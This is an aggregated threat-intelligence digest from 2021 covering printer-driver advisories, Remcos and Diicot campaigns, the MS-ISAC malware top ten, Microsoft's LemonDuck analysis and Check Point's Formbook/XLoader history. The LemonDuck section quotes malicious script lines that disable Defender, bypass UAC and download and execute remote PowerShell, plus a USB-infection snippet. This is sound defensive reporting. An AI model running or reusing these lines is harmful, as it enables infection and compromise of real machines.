Analyst Comment: The potential scope of this vulnerability is significant. Users should follow Security Advisories from both HP (HPSBPI03724) and Xerox (XRX21K) and apply the necessary patches as soon as possible. The list of affected HP and Samsung printer models can be found here, and the list of affected Xerox printers models can be found here.
Tags: Vulnerability, CVE-2021-3438, Printer driver software, HP, Samsung, Xerox

Remcos RAT Delivered via Visual Basic

(published: July 19, 2021)

Malwarebytes researchers have discovered a financially-themed malspam campaign that distributed the remote access tool (RAT) Remcos. All of the malspam email subject lines are typical for malspam delivering a commodity tool like Remcos. Some of these subject lines include: Appraisal Report for you Loan Application-1100788392210, FWD: Reminder: Your July Appointment-11002214991. The emails refer recipients to an attached archive that, if downloaded, will enable a Visual Basic script to download and execute a Remcos payload. Researchers found metadata inside the archive inside a .hta file that included “demo” in its code which researchers suggest may indicate that threat actors are testing new code.
Analyst Comment: Financially-themed malspam emails are a common tactic among threat actors, therefore, it is crucial that your employees are aware of their financial institutions policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Command-Line Interface – T1059 | REVOKED – [MITRE ATT&CK] File Permissions Modification – T1222
Tags: Malspam, VB Script, Remcos RAT

Researchers Warn of Linux Cryptojacking Attackers Operating from Romania

(published: July 19, 2021)

A new cryptojacking threat group, which is likely based in Romania and has been active since at least 2020, is actively attacking Linux-based machines with weak SSH passwords, according to Bitdefender researchers. The group uses a previously-unknown SSH brute force attack tool written in Go, dubbed “Diicot brute,” that is reportedly being sold as a software-as-a-service (SaaS). In addition, the unnamed group is also involved in distributed denial-of-service (DDoS), which involves a variant of the DDoS botnet malware Demonbot called “chernobyl.” The group is primarily-motivated by mining Monero cryptocurrency via XMRig through access gained by conducting SSH brute force attacks.
Analyst Comment: A secure password policy is crucial to taking a proactive step to mitigate password brute force attacks. Cybersecurity frameworks such as NIST offer guidelines and best practices for a variety of subjects. For passwords, it is helpful to institute at least an eight-character limit, allow use of special characters, and restrict sequential and repetitive characters.
MITRE ATT&CK: [MITRE ATT&CK] Brute Force – T1110 | [MITRE ATT&CK] Drive-by Compromise – T1189 | [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Account Manipulation – T1098 | [MITRE ATT&CK] Create Account – T1136 | [MITRE ATT&CK] External Remote Services – T1133 | [MITRE ATT&CK] Indicator Removal on Host – T1070 | [MITRE ATT&CK] Web Service – T1102 | [MITRE ATT&CK] Resource Hijacking – T1496
Tags: Threat Group, Cryptojacking, Monero mining, DDoS

Interesting research: “EvilModel: Hiding Malware Inside of Neural Network Models”.

Abstract: Delivering malware covertly and detection-evadingly is critical to advanced malware campaigns. In this paper, we present a method that delivers malware covertly and detection-evadingly through neural network models. Neural network models are poorly explainable and have a good generalization ability. By embedding malware into the neurons, malware can be delivered covertly with minor or even no impact on the performance of neural networks. Meanwhile, since the structure of the neural network models remains unchanged, they can pass the security scan of antivirus engines. Experiments show that 36.9MB of malware can be embedded into a 178MB-AlexNet model within 1% accuracy loss, and no suspicious are raised by antivirus engines in VirusTotal, which verifies the feasibility of this method. With the widespread application of artificial intelligence, utilizing neural networks becomes a forwarding trend of malware. We hope this work could provide a referenceable scenario for the defense on neural network-assisted attacks.

News article.


FortiGuard Labs has observed a new wiper malware targeting the 2021 Tokyo Olympic games. Read our blog for initial updates on this threat.

In June 2021, the MS-ISAC observed BitCoin Miner, Mirai, and Ursnif’s return to the Top 10. The Top 10 Malware variants comprise 62% of the total malware activity in June 2021, decreasing 13% from May 2021. Shlayer is likely to continue its prevalence in the Top 10 Malware for the coming quarter. However, a recent patch from Apple addresses a zero-day vulnerability Shlayer used. This is likely reducing its effect, as we saw a 57% decrease in infections from the previous month.

top 10 malware june 2021 past 6 months

Top 10 malware June 2021 pic chart of top 10

In June 2021, malvertisement accounted for the greatest number of alerts. Malvertisement continues as the top initial infection vector due to Shlayer activity. Activity levels for dropped increased, while activity for malspam, malvertisement, and multiple decreased.

Shlayer activity dropped 57% from the previous month likely due to the recent patch from Apple affecting its campaign. The patch fixes a zero-day vulnerability exploited by Shlayer to bypass Apple’s Gatekeeper, File Quarantine, and Notarization security checks. The patch will likely affect Shlayer’s ability to download second-stage malicious payloads, as well as its ability to download its own payload. However, it is unlikely to stop its initial infection vector as a whole. It is likely that malvertisement will remain the primary infection vector as the Shlayer campaign pans out.


Top 10 malware June 2021 initial infection vectors


Dropped – Malware delivered by other malware already on the system, an exploit kit, infected third-party software, or manually by a cyber threat actor. Mirai and Gh0st are the only malware dropped.

Multiple – Malware that currently favors at least two vectors. Currently, BitCoin Miner, CoinMiner, CryptoWall, and ZeuS are the malware utilizing multiple vectors. ZeuS is dropped by other malware, but it is also delivered via malvertisement.

Malspam – Unsolicited emails, which either direct users to malicious web sites or trick users into downloading or opening malware. The Top 10 Malware using this technique are NanoCore, Quasar, and Ursnif.

Malvertisement – Malware introduced through malicious advertisements. Currently, Shlayer is the only Top 10 Malware using this technique.

Top 10 Malware and IOCs

Below are the Top 10 Malware ranked in order of prevalence. The respective indicators of compromise (IOCs) are provided to aid in detecting and preventing infections from these Top 10 Malware variants. Note: The associated URIs are aligned with malware’s respective domain(s) or IP(s) and increase the likelihood of maliciousness when found together. The URIs alone are not inherently malicious.

1. Shlayer

Shlayer is a downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malvertizing posing as a fake Adobe Flash updater.
All Shlayer domains follow the same pattern <>. Below are several examples of domains Shlayer uses.



2. CoinMiner

CoinMiner is a cryptocurrency miner that uses Windows Management Instrumentation (WMI) and EternalBlue to spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence. CoinMiner spreads through malspam or is dropped by other malware.

3. Mirai

Mirai is a malware botnet known to compromise internet of things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.

4. NanoCore

NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

5. Quasar

Quasar is an open-source remote administration tool on the Windows Platform. It is used as a RAT to create backdoors.

6. ZeuS

ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants have adopted parts of its codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.

7. Gh0st

Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device.

8. BitCoin Miner

BitCoin Miner is a cryptocurrency miner that uses your computer’s resources to set up bitcoin blocks and forward them to a remote server.

9. Ursnif

Ursnif, and its variant Dreambot, are banking trojans known for weaponizing documents. Ursnif recently upgraded its web injection attacks to include TLS callbacks in order to obfuscate against anti-malware software. Ursnif collects victim information from login pages and web forms.

10. CryptoWall

CryptoWall is a ransomware commonly distributed through malspam with malicious ZIP attachments, Java Vulnerabilities, and malicious advertisements. Upon successful infection, CryptoWall will scan the system for drive letters, network shares, and removable drives. CryptoWall runs on both 32-bit and 64-bit systems.

The post Top 10 Malware June 2021 appeared first on CIS.

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call “Cat” infrastructure—for primarily using two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.


Sample Duck domains
Sample Cat domains




The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.


Sample email subjects
Sample email body content

The Truth of COVID-19
COVID-19 nCov Special info WHO
What the fcuk
good bye
farewell letter
broken file
This is your order?

Virus actually comes from United States of America
very important infomation for Covid-19
see attached document for your action and discretion.
the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
what’s wrong with you?are you out of your mind!!!!!
are you out of your mind!!!!!what ‘s wrong with you?
good bye, keep in touch
can you help me to fix the file,i can’t read it
file is brokened, i can’t open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

Figure 3. Sample email

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as custom detection rules.

Since LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.


April 2020 PowerShell script
March 2021 PowerShell script

var cmd =new ActiveXObject(“WScript.Shell”);var cmdstr=”cmd /c start /b notepad “+WScript.ScriptFullName+” & powershell -w hidden -c “if([Environment]::OSVersion.version.Major -eq ’10’){Set-ItemProperty -Path ‘HKCU:Environment’ -Name ‘windir’ -Value ‘cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(”*%username%*%computername%”+[Environment]::OSVersion.version.Major) &::’;sleep 1;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I;Remove-ItemProperty -Path ‘HKCU:Environment’ -Name ‘windir’ -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString(‘’);bpu -method migwiz -Payload ‘powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(”*%username%*%computername%”+[Environment]::OSVersion.version.Majo
//This File is broken.
var cmd =new ActiveXObject(“WScript.Shell”);var cmdstr=”cmd /c start /b notepad “+WScript.ScriptFullName+” & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(‘http://t.z’+’*mail_js*%username%*%computername%*’+[Environment]::OSVersion.version.Major);bpu (‘http://t.z’+’’)”;,0,1);
//This File is broken.


After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine(“Detect drive:”+drive.Name);
if (IsSupported(drive))
if (!File.Exists(drive + home + inf_data))
Console.WriteLine(“Try to infect “+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
else {
Console.WriteLine(drive.Name+” already infected!”);

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.


Microsoft 365 Defender Threat Intelligence Team

The post When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure appeared first on Microsoft Security Blog.


Criminals abuse a successful chat service to host, spread, and control malware targeting their users.


In our last update on the XCSSET campaign, we updated some of its features targeting latest macOS 11 (Big Sur). Since then, the campaign added more features to its toolset, which we have continually monitored. We have also discovered the mechanism used to steal information from various apps, a behavior that has been present since we first discussed XCSSET.


Original release date: July 21, 2021

As part of CISA’s ongoing response to Pulse Secure compromises, CISA has analyzed 13 malware samples related to exploited Pulse Secure devices. CISA encourages users and administrators to review the following 13 malware analysis reports (MARs) for threat actor techniques, tactics, and procedures (TTPs) and indicators of compromise (IOCs) and to review CISA’s Alert Exploitation of Pulse Connect Secure Vulnerabilities for more information. 


MAR-10333209-1.v1: Pulse Connect Secure
MAR-10333243-1.v1: Pulse Connect Secure
MAR-10334057-1.v1: Pulse Connect Secure
MAR-10334057-2.v1: Pulse Connect Secure
MAR-10334587-1.v1: Pulse Connect Secure
MAR-10334587-2.v1: Pulse Connect Secure
MAR-10335467-1.v1: Pulse Connect Secure
MAR-10336161-1.v1: Pulse Connect Secure
MAR-10336935-1.v1: Pulse Connect Secure
MAR-10337580-1.v1: Pulse Connect Secure
MAR-10337580-2.v1: Pulse Connect Secure
MAR-10338401-1.v1: Pulse Connect Secure
MAR-10338868-1.v1: Pulse Connect Secure

This product is provided subject to this Notification and this Privacy & Use policy.

Quick Heal Security Lab has seen a sudden increase in dotnet samples which are using steganography. Initially, in…

The post FormBook Malware Returns: New Variant Uses Steganography and In-Memory Loading of multiple stages to steal data appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.


We recently conducted an investigation into a malicious Android malware sample, which we believe can be attributed to the StrongPity APT group, that was posted on the Syrian e-Gov website. To the best of our knowledge, this is the first time that the group has been publicly observed using malicious Android applications as part of its attacks.

Malware  Cybercrime and Cloud SecurityOrganizations have expedited use of and reliance on public cloud services to run their businesses in ways that would have been hard to anticipate, even a few years ago. And for many smaller businesses without dedicated cybersecurity functions, skills or tools, public cloud services could offer a level of protection they may otherwise lack on-premises. But don’t assume basic cloud security services are a cure-all or dissuasion to bad actors.

Today there is no safe haven from ransomware. In fact, attacks are targeting data and applications in the cloud nearly as often as they are directed at on-premises resources. Read the Full Article.


From a simple keylogger to a top prevalent malware

Formbook is currently one of the most prevalent malware. It has been active for more than 5 years already. Check Point reported in December 2020 that Formbook affected 4% of organizations worldwide and made it to the top 3 list of the most prevalent malware.

According to AnyRun Malware Trends Tracker, Formbook occupies the 4th place in a list of the most prevalent malware families in 2020.

Figure 1 – Formbook is in 4th place among the most prevalent malware families of the past 12 months (June 2020 – June 2021) – AnyRun.

Formbook is an Info Stealer that harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to the orders received from Command-and-Control (C&C) servers. The code is written in C with assembly inserts and contains a number of tricks to make it harder for researchers to analyze it.

As stated by its author, Formbook was intended to be “a simple keylogger.”  However, customers immediately saw its potential as a universal tool for use in broad spam campaigns that target organizations all over the world. As this potential became a reality, the author stopped sales of the product without giving detailed explanations about the motives behind this decision.

A short time later, Formbook was reborn as XLoader, and the malware is now available for sale in the underground forum by a different avatar. XLoader opened up several new opportunities, with the ability to operate in the macOS being one of the most exciting. XLoader’s story is on-going, and judging by the popularity of the malware, shows no signs of ending any time soon.

Let’s take a look at how it all began.

Formbook: unintended popularity

A post offering the earliest version of Formbook (what we could call a beta-version) for sale appeared on the underground forum on February 13, 2016.

Figure 2 – ng-Coder offering Formbook malware for sale.

Although the first sales thread appeared on February 13, 2016, Formbook samples were seen earlier as evidenced by AnyRun:

Figure 3 – First Formbook sample was seen on January 1, 2016, according to AnyRun.

The Formbook’s seller was hidden under “ng-Coder” avatar.

Note: we assume ng-Coder is a male, though we have no direct evidence, and will refer to the avatar as “he” throughout this article.



Skype: Ng.Coder


* strong cc++ knowledge

* strong assembly x86x64 knowledge

ng-Coder joined the underground hack forum on October 27, 2015. According to his own statement on the forum, he was selling exploits at that time. We cannot point to ng-Coder’s exact country of origin, but judging by his phrasing, English is likely not his native language.

A day before creating the sales thread we saw above, ng-Coder requested a review of his product from an experienced member of the community.

Figure 4 – Formbook review requested by ng-Coder.

On May 9, 2016, three months later after publishing the first sales thread, Formbook v.0.3 was offered for sale.

Figure 5 – Formbook v.0.3 icon.

Formbook was advertised as a product supporting multiple features:

Figure 6 – Formbook v.0.3 features.

What attracted our attention here is a strange description including the phrase “Balloon Executable” and the acronyms MPIE and MEE. These terms, which do not exist in the cyber community, were used by ng-Coder to describe how Formbook operates, i.e., uses position-independent code (shellcode) to inject the malware into a legitimate system process and initiate the shellcode execution.

Other features listed include network traffic sniffing, keylogging, clipboard monitoring, and password extraction for almost one hundred applications including browsers, messengers, FTP and email clients.

The sales pitch was a combined model, in which a customer could choose where to host the panel: on the host provided by the seller (thus using a “Malware-as-a-Service” scheme) or the customer’s own machine (direct acquiring). If the latter was selected, the author also provided the panel source code along with a pre-built binary.

Different types of Formbook subscriptions had different prices:

Figure 7 – The Formbook pricing as offered by ng-Coder.

ng-Coder offered a number different source code protectors to support Formbook. For example, Net-Protector is a cross-platform crypting service with the price of $100 for a Windows executable and $200 for a macOS one:

Figure 8 – Net-Protector logo.

ng-Coder was so confident in his creation that he offered to re-crypt an executable for free if it was detected by any AV in the first 30 days after the encryption:

If the crypted PE file gets flagged by AV in less than 30 days after the first crypt, we will recrypt the same crypted SHA1 for free.

Other examples of protectors included shared source codes of crypting solutions on .NET and Delphi.

On October 6, 2017, Formbook sales abruptly stopped. The reason given was its use in spam campaigns:

Figure 9 – ng-Coder indicates that Formbook sales have ceased.

As we stated at the beginning of this article, the Formbook author didn’t want his creation to be used in email campaigns and banned all customers who did so.

On May 27, 2018, ng-Coder made his last public post on the forum where he provided a technical answer to one of the questions not related to Formbook. No further activity from him has been observed since.

As we will see, although Formbook sales were stopped, its activity was continuing. Not only could users who bought the malware to be hosted on their own servers continue to use it, but ng-Coder could make use of Formbook as well.

Used for the author’s own purposes?

We found evidence that ng-Coder might have his own plans for his creation. We analyzed the domains linked to the ng-Coder email address “ng2coder@gmail[.com” and discovered that these were used in Formbook configurations for particular campaigns labeled “private”, “list” and “zog”. We found 16 unique C&C URLs inside the Formbook malware that pointed to 13 different sub-campaigns.



















All the listed domains share common features. They all were registered by the GoDaddy registrar:

Figure 10 – GoDaddy registrar appears in domains’ details.

And they all shared the same details about the person who registered them:

Figure 11 – Details for registering domains as provided by ng-Coder.

According to the LocateFamily site, “Amanda George” was living at the address provided at the time of registering the domains. However, we cannot link this person with ng-Coder avatar.

The Formbook activity didn’t just stop there. For example, in May 2020 we discovered a Formbook sample dropped by GuLoader. It was submitted to VirusTotal in June 2020:

Figure 12 – A Formbook sample dropped in May 2020 by GuLoader.

The campaign name in this sample was “private” and the main domain was registered by ng-Coder (ryandeby[.com).

XLoader: the time-proved tricks re-applied in a new environment

On February 6, 2020 a new era began: the era of the Formbook successor called XLoader. On this day, XLoader was advertised for sale in one of the underground groups.

Figure 13 – XLoader as advertised in the underground group.

Formbook and XLoader share the same code base, and there are other connections between them as well, as we will see later.

Figure 14 – The seller confirms that Formbook’s code has contributed a lot to the development of XLoader.

On October 20, 2020, XLoader was offered for sale on the same forum which was used for selling Formbook.

Figure 15 – XLoader as advertised on the forum.

Note: XLoader malware for PC and Mac should not be confused with XLoader malware for Android, first discovered in 2019.

One of the most exciting things about the new malware was its ability to operate in the macOS. With approximately 200 million users operating macOS in 2018 (as reported by Apple), this is definitely a promising new market for the malware to enter.

Figure 16 – Mac sales by year, taken from

Note: Apple stopped reporting Mac sales in Q4 2018. All subsequent values are estimates.

The malware now features a more lucrative economic model for the authors as compared to Formbook. Customers may only buy the malware for a limited time and are only able to use a server provided by the seller; no panel sources codes are sold anymore. Thus, a “Malware-as-a-Service” scheme is used. Centralized C&C infrastructure allows the authors to control how the malware is used by the customers.

Figure 17 – xloader announces the decision to stop selling panels and underlines the importance of controlling the customers’ actions.

The pricing for different options is listed in the table below:



Windows, executable, 1 month


Windows, executable, 3 months


macOS, Mach-O, 1 month


macOS, Mach-O, 3 months


XLoader’s seller also released a free Java binder which is intended to create a standalone JAR file uniting Mach-O and exe binaries:

Figure 18 – Interface of the XBinder tool.

A new developer?

Did the new seller also take on duties as the developer and maintainer of this version of the original Formbook malware? We believe this is not the case. A new seller is just a seller, not a developer.  There must be someone else behind the curtain to handle the technical part.

Figure 19 – XLoader’s seller states that he is an official seller, not a developer of the malware.

We already saw that ng-Coder wasn’t completely out of the picture, even though he no longer operated publicly. Could he be the one continuing to develop the new malware? Apart from technical similarities, we found evidence of a connection between XLoader’s seller and ng-Coder, namely a  message from xloader to ng-Coder saying, “Thank you for the help”:

Figure 20 – xloader saying “thank you” to ng-Coder.

We cannot say for sure if the thanks were for a one-time helping hand or if it was for continuous support.

Another piece of evidence that points at ng-Coder’s continued participation is the statement by XLoader’s seller (posted on December 14, 2020) where he shared his hope that ng-Coder could create a newer cross-platform crypting service:

Figure 21 – xloader sharing the hope about a new crypting service from ng-Coder.


We recap the malware activity timeline and its milestones in the diagram below.

Figure 22 – The activity timeline of both malware versions.


During the lifecycle of Formbook/XLoader malware, a number of impersonators and re-sellers claimed they were the official contacts.

It began 5 years ago when ng-Coder raised a warning not to send a payment to him or anyone impersonating him for the exploit, as he stopped selling exploits in 2016. Note that there were impersonators even before Formbook was first available for sale.

In 2021, the situation hasn’t changed much. For example, there is a site freely accessible from the Internet which offers XLoader for sale, but for a higher price than the malware is sold for in the Darknet:

Figure 23 – A site in the Internet offering XLoader for sale.

The biggest difference is in the 3 months package for macOS, which is $40 higher than the Darknet price.

Another site offers XLoader for $120:

Figure 24 – Another Internet site offering XLoader for sale.

Prevalence: countries and campaigns

During the 6 months between December 1, 2020 and June 1, 2021, we saw Formbook/XLoader requests from as many as 69 countries, which is more than a third of the total 195 countries recognized in the world today.

The breakdown of victims by country is presented in the diagram below:

Figure 25 – Formbook requests by countries between December 1, 2020 and June 1, 2021.

Victims from the United States constitute more than the half of the victims worldwide.

As we stated previously, according to AnyRun, Formbook is in 4th place among the most prevalent malware families of the last year and in 6th place for all time. This fact implies that there should be quite a lot of FormbookXLoader campaigns in-the-wild. Indeed, we observed more than 1400 different campaigns of the malware during several years of monitoring its activity.

In the upcoming articles we share the technical details of the malware’s macOS version which reveal how XLoader operates under the hood and help us to understand how the FormbookXLoader family secured its place in malware top prevalence lists.

We also describe a distinctive feature of the XLoader malware which helps it to fool sandboxes and researchers and keep its real C&C servers hidden. Out of almost 90,000 domains used in network communication by the malware, only 1,300 are the real C&C servers – which constitutes just 1.5% of the total. The other 88,000 domains belong to legitimate sites; however, the malware sends malicious traffic to them as well. This presents security vendors with the dilemma of how to determine which are the real C&C servers and not false-positively identify legitimate sites as malicious.

We also share our methods to correctly analyze the XLoader’s communication with the servers and to identify the real C&C – only one out of all the 64 domains present in any chosen sample.

Stay tuned!

Check Point Protections

As a part of the Check Point SandBlast Zero-Day Protection solution, SandBlast Network prevents these attacks. This innovative zero-day threat sandboxing capability within the SandBlast solution delivers the best possible catch rate for these threats.

SandBlast Network Protections:



















Threat Emulation protections:










Check Point Press Release December 2020 //

Malware Trends Tracker //

Malware Analysis Spotlight: Formbook (September 2020) // 

Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea //

Formbook Research Hints Large Data Theft Attack Brewing //

Selling FormBook //

Cybercrime, new Formbook malspam campaign against hotels //

VB 2018: Inside Formbook Infostealer //

GuLoader? No, CloudEyE //

Yes, Cyber Adversaries are still using Formbook in 2021 //

The post Top prevalent malware with a thousand campaigns migrates to macOS appeared first on Check Point Research.

Itai Tevet, CEO of Intezer, shares the company’s vision for a simplified, consolidated malware analysis experience.

Since its inception, Intezer has strived to be an innovator in malware analysis. We introduced a new way to analyze malware through genetic code sequencing: identifying code reuse to pinpoint the origins of potential threats rather than running them in a sandbox just to get vague behavioral info.

